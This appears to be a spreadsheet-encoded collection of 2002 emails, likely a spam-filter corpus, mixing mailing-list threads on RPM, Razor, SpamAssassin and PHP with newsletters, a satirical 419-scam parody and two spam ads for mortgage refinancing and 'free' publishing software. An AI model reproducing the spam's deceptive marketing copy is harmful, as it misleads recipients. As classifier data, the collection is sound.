 after the sale. 
 The contraction of the new economy has undoubtedly hurt
 Hotwire, which is privately owned. Mr. Peterson said that
 the company was still unprofitable but that Texas Pacific
 remains committed to it. 
 Last spring, Mr. Peterson met Mr. Bonderman in Aspen to
 talk about Hotwire and to go snowboarding. Mr. Bonderman
 seemed perfectly willing to accompany Hotwire down the
 steep Internet chute. But he does have his limits on risk,
 Mr. Peterson discovered. Before going down the mountain,
 Mr. Bonderman strapped on a helmet.  
 http://www.nytimes.com/2002/08/25/business/yourmoney/25TEXA.html?ex=1031278887&amp;ei=1&amp;en=05fca479b8bcee6b
 HOW TO ADVERTISE
 ---------------------------------
 For information on advertising in e-mail newsletters 
 or other creative advertising opportunities with The 
 New York Times on the Web, please contact
 onlinesales@nytimes.com or visit our online media 
 kit at http://www.nytimes.com/adinfo
 For general information about NYTimes.com, write to 
 help@nytimes.com.  
 Copyright 2002 The New York Times Company
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Laura Bush's 419 letter
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85486499
 Date: Not supplied
 A new addition to the parodical genre of 419 ("Nigerian Money Laundry Scam") 
 letters from members of the Shrub establishment, following up on Cheney's 
 letter[1]. 
     I am the widow of the late President George W. Bush of the United States of 
     America. I am writing you this letter in confidence regarding my current 
     circumstances. 
     I escaped the United States ahead of death squads with my husband and two 
     children Jenna and Frank, moving first to England and then, when my 
     husband's political enemies took power there, to Austria. All of our 
     wealth, obtained legitimately through baseball, oil drilling and insider 
     trading, was seized by the new government of the USA under the despotic 
     regime of (Dr.) Noam Chomsky, except for the contents of a few Swiss bank 
     accounts. These bank accounts, which contain social security lock-box funds 
     and the bulk of the 2001 budget surplus, could not be accessed by me or my 
     children, due to agreements made between the socialist government of the 
     USA and Swiss bank regulators. They seized our ranch in Crawford, Texas and 
     now use it to teach homosexualist propaganda to schoolchildren.  
 Link[2] Discuss[3] (_Thanks, Stefan!_)
 [1] http://atrios.blogspot.com/2002_08_18_atrios_archive.html#80547516
 [2] http://brainslug.org/archives/000224.html#000224
 [3] http://www.quicktopic.com/boing/H/7zkxnLj3i6Da
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Documentation about built-in RPM macros?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.
 Dave Cridland &lt;dave@cridland.net&gt; wrote:
 &gt; &gt; recommends *against* using '%configure' ("We will try to support users
 &gt; &gt; who accidentally type the leading % but this should not be relied
 &gt; &gt; upon."), and yet
 [snip]
 &gt; They're just suggesting people use "./configure" instead.
 No, they do not (what would be the use of that, anyway?). They say that
 they will _try_ to eval macros even if the user forgot to pass the
 leading '%', but that this feature should not be relied upon.
 -- 
 On the first day of Christmas my true love sent to me
        A badly configured newsreader
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Shouldn't there be a w, somewhere in tehre?  Simply setting group and 
 owner to read and execute won't alleviate a write problem.
 On Thu, 5 Sep 2002, Michael Duff wrote:
 &gt; This is due to insufficient write privileges to the "razor-agent.log" 
 &gt; file. A quick work-around is to do a "chmod go+rx" on that file (of 
 &gt; course, it's better to restrict the access as much as possible).
 &gt; 
 &gt; In Agent.pm, when the Razor2::Logger object is created, if it doesn't 
 &gt; have write permission to the log file it does not succeed. Then, later 
 &gt; in the code when the log object is used, it fails with the "unblessed" 
 &gt; error.
 &gt; 
 &gt; Hope this helps,
 &gt; Michael Duff
 &gt; 
 &gt; David Rees wrote:
 &gt; 
 &gt; &gt;This is my first time running Razor, heard a lot of good things about it so
 &gt; &gt;I thought I'd give it a shot.  I also run SpamAssassin so I'd like to
 &gt; &gt;integrate the two.
 &gt; &gt;
 &gt; &gt;I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd
 &gt; &gt;shoot the message here first
 &gt; &gt;
 &gt; &gt;With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these
 &gt; &gt;messages spit out from spamd:
 &gt; &gt;
 &gt; &gt;razor2 check skipped: No such file or directory Can't call method "log" on
 &gt; &gt;unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm
 &gt; &gt;line 211, &lt;STDIN&gt; line 75.
 &gt; &gt;
 &gt; &gt;Any ideas?  razor seems to run correctly over the command line.
 &gt; &gt;
 &gt; &gt;Thanks,
 &gt; &gt;-Dave
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;-------------------------------------------------------
 &gt; &gt;This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; &gt;cell phone?  Get a new here for FREE!
 &gt; &gt;https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; &gt;_______________________________________________
 &gt; &gt;Razor-users mailing list
 &gt; &gt;Razor-users@lists.sourceforge.net
 &gt; &gt;https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; &gt;  
 &gt; &gt;
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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
 On Tue, 10 Sep 2002 01:20:56 PDT,
 	J C Lawrence &lt;claw@kanga.nu&gt; wrote:
 &gt; On Mon, 09 Sep 2002 15:36:37 -0400 
 &gt; Tom Reingold &lt;noglider@pobox.com&gt; wrote:
 &gt; 
 &gt; &gt; At work, I have to use Outlook.  Ick.  I hate it.  
 &gt; 
 &gt; Ahh.  At work we fire people who use Outlook (Literally true: They get
 &gt; escorted to the door, their badge confiscated, and told to return the
 &gt; next day to collect their office contents).
 Why?  What threat does Outlook pose to your organization?
 &gt; &gt; But it does a few things right.  Like making indices for each folder,
 &gt; &gt; and not just by date, but also by sender, message size, subject.  So I
 &gt; &gt; can sort by any column instantly.
 &gt; 
 &gt; Have you looked into using a custom sequences file?
 More detail please?  I do use sequences, so I'm familiar with their
 use, but how can I make indices with them, and how can I keep them
 up to date?
 &gt; &gt; And mime handling is pretty bad compared with modern mailers.
 &gt; 
 &gt; The only thing I actually miss in that regard is support for S/MIME.
 You're probably running exmh on a local machine.  I'm running it on
 a very remote machine.  In this scenario, the mime handling is weak.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] dependencies / pre-requisites for installation in
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; Would someone please enlighten me on dependencies / pre-requisites
 &gt; &gt; for installation in FreeBSD. The 'official' documentation isn't
 particularly
 &gt; &gt; explicit about this stuff .... eg 'procmail' is mentioned but without
 saying
 &gt; &gt; whether or not its essential, &amp; no info provided on whether GNUmake is
 &gt; &gt; required or if standard BSD 'make' is OK.
 &gt;
 &gt; I thought we were quite good about it, in the README file!
 &gt;
 &gt; procmail is essential *if* you're using (a) SpamAssassin for local
 &gt; delivery, (b) not using a milter, and (c) not using a Mail::Audit
 &gt; script instead.  So probably yes.
 &gt;
 &gt; BSD make is OK, if Perl generally uses it to build Perl modules.
 &gt; SpamAssassin is just anotehr Perl module in that respect.
 &gt;
 Back to this stuff again  ..... searched high &amp; low but definitely nothing
 on this system even vaguely resembling a README file for spamassassin.
 I have procmail installed but having major problems comprehending the
 setup .... would appreciate info on any 'simple english' HOWTo
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: when building a rpm i386-redhat-linux- is appended to man page
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; 
 &gt; The workaround is to pass an extra argument to configure as follows :
 &gt; 
 &gt; %configure --program-prefix=%{?_program_prefix:%{_program_prefix}}
 &gt; 
 This works when you are defining a switch that %configure
 does not already define, but how can we override an
 existing switch?  For example,
   prefix: /usr/local
   %configure --prefix=%{?_prefix:%{prefix}}
 would be desirable for making a .rpm package relocatable,
 but this doesn't work.  'configure' receives two switches,
 the default '--prefix=/usr' and the (attempted) override
 '--prefix=/usr/local', but it only recognizes the first one.
 ---
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Interest rates are DOWN!! ntbri
</t>
  </si>
  <si>
    <t xml:space="preserve">INTEREST RATES HAVE JUST BEEN CUT!!!
 NOW is the perfect time to think about refinancing your home mortgage! Rates are down! Take a minute and fill out our quick online form. 
  http://210.201.52.130/homesavings/
 Easy qualifying, prompt, courteous service, low rates! Don't wait for interest rates to go up again, lock in YOUR low rate now!
 ---------------------------------------
 To unsubscribe, go to: http://210.201.52.130/nomoremail/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Tabor J. Wells wrote:
 &gt; And where does it say production-ready? http://razor.sourceforge.net
 &gt; says at the top of the page:
 &gt;
 &gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's
 &gt; Razor v2 is now available for public download.
 1)  I think the code is still very much pre-beta.
 2)  When you go to the "Download" page, it tells you "Fetch the latest
 versions of razor-agents and razor-agents-sdk packages"  It is not at all
 clear that these are development packages.
 The site is badly designed, and very misleading.  IMO.  The fact that the
 word "beta" appears in the middle of some introductory text on the front
 page is hardly a valid argument.  (Well accepted software design "fact":
 USERS DON'T READ *ANYTHING*)
 I get the impression that Vipul &amp; co are deliberately trying to mislead
 users into downloading the dev code in order to get more unwitting test
 sites.
 But that's just my opinion, I could be wrong.
 rOD.
 --
 Anyway... long story short...
 ...is a phrase whose origins are complicated and rambling.
 &gt;&gt; Doing the blogging thang again at http://www.groovymother.com/ &lt;&lt;
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Webdev] PHP+Javascript request
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-19 at 18:28, Dave Wilson wrote:
 &gt; IIRC, if the query string contains
 &gt; 
 &gt; varname=FIRST&amp;varname=SECOND
 &gt; 
 &gt; then PHP will create a variable called "varname" with result SECOND. 
 &gt; However, if the query string contains
 &gt; 
 &gt; varname[]=FIRST&amp;varname[]=SECOND
 &gt; 
 &gt; then PHP will create an array with varname[1]==FIRST and varname[2]==SECOND
 By far the coolest solution to this would be to "fix" php :)
 Take a look at main/php_variables.c in the php source distribution.
 You could mess around with the variable is_array in
 php_register_variable_ex() and see if you can force all variables to be
 arrays :) As far as I can tell the reason they do this is to save
 time by not having to work out which variables have multiple values.
 Nick
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-10-08 at 04:48, Panu Matilainen wrote:
 &gt; On Mon, 7 Oct 2002, Jesse Keating wrote:
 &gt; 
 &gt; &gt; On Mon, 7 Oct 2002 19:28:51 +0200
 &gt; &gt; Matthias Saou &lt;matthias@rpmforge.net&gt; wrote:
 &gt; &gt; 
 &gt; &gt; # I've never heard of any CD-ROM or DVD-ROM drive having problems with
 &gt; &gt; # DMA... although there probably is since Red Hat decided to default
 &gt; &gt; # disabling it a few releases back :-/
 &gt; &gt; 
 &gt; &gt; When I worked as a PC repair tech for a Computer store chain, I did
 &gt; &gt; run across quite a few DVD drives that would lock up if DMA was
 &gt; &gt; enabled.  It's more of a chipset/drive problem than a Drive by itself.
 &gt; 
 &gt; And my IBM Intellistation would lock up instantly .. now this is actually 
 &gt; quite funny .. if DMA was enabled for the CD-ROM *and* you tried to access 
 &gt; a CD with Joliet extensions. Otherwise it worked just fine with DMA 
 &gt; enabled :)
 Odd. Did I certify that one? What's the 7-digit IBM model number, and
 which version of Red Hat were you running?
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RSS Critical Mass
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000221.html
 Date: 2002-10-03T21:59:32-08:00
 Is it just me, or is RSS really, really close to critical mass. You, know the 
 kind where you read article in The Wall Street Journal about it. Well, Dave 
 notes that "I just learned that RSS is being taught...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Paperless Publishing is Here and Now
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Publishing Tools - Free Software Alert!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;center&gt;
 &lt;table width="582" border="2" cellspacing="0" cellpadding="5" bordercolor="#0077CC"&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt;&lt;!8749mtDF5-466PBl14&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt;Publish Like a Professional with Digital Publishing Tools&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="1" width="204" valign="top"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Easily Create Professional:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;eBooks&lt;/li&gt;
 &lt;li&gt;eBrochures&lt;/li&gt;
 &lt;li&gt;eCatalogs&lt;/li&gt;
 &lt;li&gt;Resumes&lt;/li&gt;
 &lt;li&gt;Newsletters&lt;/li&gt;
 &lt;li&gt;Presentations&lt;/li&gt;
 &lt;li&gt;Magazines&lt;/li&gt;
 &lt;li&gt;Photo Albums&lt;/li&gt;
 &lt;li&gt;Invitations&lt;/li&gt;
 &lt;li&gt;Much, much more&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="264" valign="top" align="center"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Save MONEY! - Save Trees&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;
 Save on Printing, Postage and Advertising Costs&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000099" size="5"&gt;DIGITAL PUBLISHING TOOLS&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="3"&gt;DOWNLOAD NEW FREE Version NOW!&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;*Limited Time Offer&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width="204" valign="top"&gt;&lt;b&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" size="2" color="#000066"&gt;Choose from these&lt;br&gt;
 Display Styles:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;3D Page Turn&lt;/li&gt;
 &lt;li&gt;Slide Show&lt;/li&gt;
 &lt;li&gt;Sweep/Wipe&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;Embed hyperlinks and Link to anywhere Online, 
 such as your Website, Order Page or Contact Form.
 &lt;br&gt;
 &lt;br&gt;
 Distribute via Floppy, CD-ROM, E-Mail or Online.
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt; 
 &lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;
 Take your Marketing to the Next Level!&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2" width="384"&gt; 
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 For &lt;b&gt;More Info&lt;/b&gt;, &lt;b&gt;Samples&lt;/b&gt; or a &lt;b&gt;FREE Download&lt;/b&gt;, click the appropriate link to the right! &amp;nbsp;
 Server demand is extremely high for this limited time &lt;b&gt;Free Software&lt;/b&gt; offer. &amp;nbsp;
 &lt;b&gt;Please try these links periodically if a site seems slow or unreachable.&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="204" align="center"&gt; 
 &lt;b&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href="http://3dpageturningebook.com"&gt;WEBSITE 1&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://TheyGo.com/FreeSoftware"&gt;WEBSITE 2&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.digitalpublishingtools.com"&gt;WEBSITE 3&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center"&gt;
 &lt;form action="http://www.3dpageturningebook.com/unsubscribe.asp" method="post"&gt;
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 If you wish to be removed from our mailing list, please cick the Unsubscribe button
 &lt;/font&gt;
 &lt;br&gt;
 &lt;input size="25" name="e" value="zzzz@jmason.org
 "&gt; &amp;nbsp;&lt;input type="submit" value="Unsubscribe"&gt;
 &lt;input type="hidden" name="c" value="unsub"&gt;
 &lt;/form&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color=#000066 size=1&gt;Copyright  2002 - Affiliate ID #1269&lt;br&gt;
 *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Cranky Beats
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020722.html"&gt;
       http://www.lockergnome.com/issues/daily/20020722.html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&lt;/style&gt;&lt;title&gt;20020722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href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=36698.10000263&amp;type=4&amp;subid=0"&gt;&lt;IMG  width="468" height="60" alt="10354" border="0" src="http://www.winnetmag.com/linkshare/banners/10354.gif"&gt;&lt;/a&gt;&lt;IMG border="0" width="1" height="1" src="http://ad.linksynergy.com/fs-bin/show?id=vdKWfulJxTQ&amp;bids=36698.10000263&amp;type=4&amp;subid=0"&gt;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07.22.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Hackers and crackers respect only one thing:&lt;/b&gt; &lt;font color="blue"&gt;strong security&lt;/font&gt;.  Keep the bad guys out of your PC or network with the advanced technology that's trusted by millions:  ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends your online privacy,and sets up in minutes. &lt;a href="http://click.linksynergy.com/fs-bin/click?id=vdKWfulJxTQ&amp;offerid=26986.10000012&amp;type=3&amp;subid=0"&gt;Click here to download now&lt;/a&gt;!   
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Listen to Lockergnomie Dale Lowery and you'll save time
 immediately. It's an old tip, but it bears repeating: "I'll often
 find Web snippets I'd like to keep - but I don't want to save the
 entire page. So, I've HOT-KEYED Notepad. Easy! Get to the most
 common Notepad shortcut icon: Start | Programs | Accessories |
 Notepad. Then right-click on the menu item and select Properties.
 You'll see that this is (indeed) a shortcut; in the lower part of
 the dialog is a field to add a hotkey. I entered 'N' for Notepad,
 Windows offered CTRL and ALT as a prefix, and now I can launch
 Notepad in an instant. I highlight the text I want to keep, copy
 it, tap my shortcut, paste it, and then save the new text file
 wherever I want. Most often, I use this trick to copy paragraphs
 that describe downloads (and save them as text files in the same
 folder as the download)." Just make sure you don't pick a keyboard
 shortcut that's already in use. Otherwise, one of them is gonna
 get cranky.
 &lt;p&gt;
 And while we're taking a trip down memory lane, Lockergnomie Ian
 Rich reminds us of Jouni Vuorio's utility: The site is
 &lt;a href="http://www.jv16.org/"&gt;jv16.org&lt;/a&gt;. The program is called
 jv16 Power Tools, and this freeware is truly worthy of praise. It
 combines a full-on registry management tool with several file
 manager tools: one to hunt down temporary files in any format and
 the other to help perform advanced file searches and comparisons.
 Mainly, I wanted the program to be brought to the attention of the
 consumer public, as it moves further and further along in
 development it just keeps getting better. I've used it on windows
 Me, and now XP - without crashes or hair-raising Registry
 corruption. It backs up everything it changes and is very easy to
 use. If you're interested in something of shareware-quality with
 forum support (for absolutely nothing), get this program. Anyway,
 I love the newsletter and the work you guys and gals do at
 Lockergnome. I hope that this author gets his recognition."
 Consider this a huge nod!
 &lt;p&gt;
 I love a good resource, and Lockergnomie Elton Jonsson from the
 United Kingdom has one for us, too: "As a dedicated subscriber, I
 just had to tell about this one. Have you ever been driven mad
 trying to find out the name of the piece of music on a television
 advert? Well, at last, here in the UK, we have an answer to that
 problem and, given that many multinationals use the same
 advertising in the USA as they do here, it may help out you guys
 as well. Check out &lt;a href="http://www.commercialbreaksandbeats.co.uk/"&gt;Commercial
 Breaks and Beats&lt;/a&gt;. I have no connection with it; I'm just
 grateful that someone has had the brilliant idea of creating it.
 If you check the message board on the site, you'll see that I'm
 not alone." This &lt;a href="http://directory.google.com/Top/Arts/Television/Commercials/"&gt;Google
 Directory&lt;/a&gt; can help fill in the blanks, I'm sure. I
 almost fell out of my chair the other day when I heard "Yeh Yeh"
 (by TMBG) being played on a Chrysler advertisement. Way to go:
 John, John, Dan, Dan, and Dan! You're the dogs kids love to bite.
 &lt;p&gt;
 And what's say we round out the report with another tip?
 Lockergnomie David Brown can oblige: "The e-mail forwarding
 service is a good idea, but you can do it yourself with Outlook
 Express. Set up two accounts (one for your old account and one for
 your new one). Craft your reply in a new message and save it.
 Then, select Tools | Message Rules | Mail | New rule. Check 'Where
 the message is from specified account' in the first section.
 'Reply with message" in section two. Select the appropriate
 account and message in the final section. Name it. You can also
 have the messages flagged or moved to another folder if you want
 to know which messages came from the old account. Once the rule
 has been created, any mail from the old account will have a reply
 sent. People should learn about mail rules, anyway." True! So,
 what rule simplifies your day?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&lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Latest Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A title="shareware: web site search engine" HREF="http://www.mywebattack.com/gnomeapp.php?id=104741"&gt;Search Engine Buil 1.45&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: clean your hard drive" HREF="http://www.mywebattack.com/gnomeapp.php?id=103363"&gt;System Cleaner 4.80&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: internet privacy tools suite" HREF="http://www.mywebattack.com/gnomeapp.php?id=103079"&gt;Smasher 2.9.16&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: " HREF="http://www.mywebattack.com/gnomeapp.php?id=102665"&gt;PixPrint 3.69&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: batch image editor" HREF="http://www.mywebattack.com/gnomeapp.php?id=100549"&gt;BatchIt! Pro 3.10&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: HTML compiler" HREF="http://www.mywebattack.com/gnomeapp.php?id=101621"&gt;HyperMaker HTML 2002.11&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: create web buttons" HREF="http://www.mywebattack.com/gnomeapp.php?id=104412"&gt;Crystal Button 1.41&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: anti-spam filter" HREF="http://www.mywebattack.com/gnomeapp.php?id=105068"&gt;Spytech SpamAgent 1.0&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: recover data from damaged disks" HREF="http://www.mywebattack.com/gnomeapp.php?id=104512"&gt;BadCopy Pro 3.20&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: popup blocker" HREF="http://www.mywebattack.com/gnomeapp.php?id=104573"&gt;STOPzilla! 1.0.8&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: " HREF="http://www.mywebattack.com/gnomeapp.php?id=103660"&gt;WAPDraw 1.31&lt;/A&gt;&lt;BR&gt;
 &lt;A title="shareware: Data replication tool" HREF="http://www.mywebattack.com/gnomeapp.php?id=102389"&gt;Network File Monit 2.04&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;QuicKalendar v1.0.2 [430k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="url" href="http://www.trinfinitysoftware.com/quickalendar.shtml"&gt;http://www.trinfinitysoftware.com/quickalendar.shtml&lt;/a&gt;
 &lt;p&gt;
 {Calendar utility} You say you want to get together on the 25th, but what DAY is that? I'm not good with calendar dates; truth be told, I don't even know what day of the week it is most the time. If I didn't have my PDA armed with a Calendar with me, then I wouldn't show up to anything on time, let alone on the right day. Well, that is great for when I am mobile, but what about when I am in front of my PC? The PDA is docked, but that doesn't mean I have to be without a calendar... enter QuicKalendar! "QuicKalendar gives you quick and easy access to a calendar whenever you need it. You can view the calendar on screen, or print it out to jot down notes and appointments." You need to keep in mind that the print feature is relative to how you have QuicKalendar displayed on your machine. If you are in full screen mode, then the printout will be bigger than a standard sheet of letter paper. If you try printing in normal view, then the printout will be too small to write on. My suggestion is to play with the size of QuicKalendar's screen until you get a printout that you can be proud of. Now, you'll have no reason to be late for Gnomedex!
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Diatris v1.0 [407k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="url" href="http://www.webruler.com/mtreciokas/"&gt;http://www.webruler.com/mtreciokas/&lt;/a&gt;
 &lt;p&gt;
 {Tetris-like game} I've always been fascinated with geometric shapes. To me everything has to be somewhat symmetrical... even my hair! So it was no wonder why I was addicted to playing the game Tetris for so many years. The only problem with Tetris is that, after awhile, it starts to get a little too easy. Diatris is a bundle of three different - and much more challenging - Tetris-like games. "For the first game, Y-Diatris, the objects can move vertically and diagonally. The second game, X-Diatris, the objects can move only in two diagonal directions; the vertical drop is taken out. For the last game H-Diatris the objects can only move vertically and horizontally like most block drop games." I won't kid you, these games can be pretty hard, but if you are a Tetris fan, then these set of games are for you. If you're not a Tetris fan, don't worry, there are a few other games you might like on this site, so check it out!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&lt;b&gt;How to Troubleshoot Issues with Reading CDs&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="url" href="http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q321641"&gt;http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q321641&lt;/a&gt;
 &lt;p&gt;
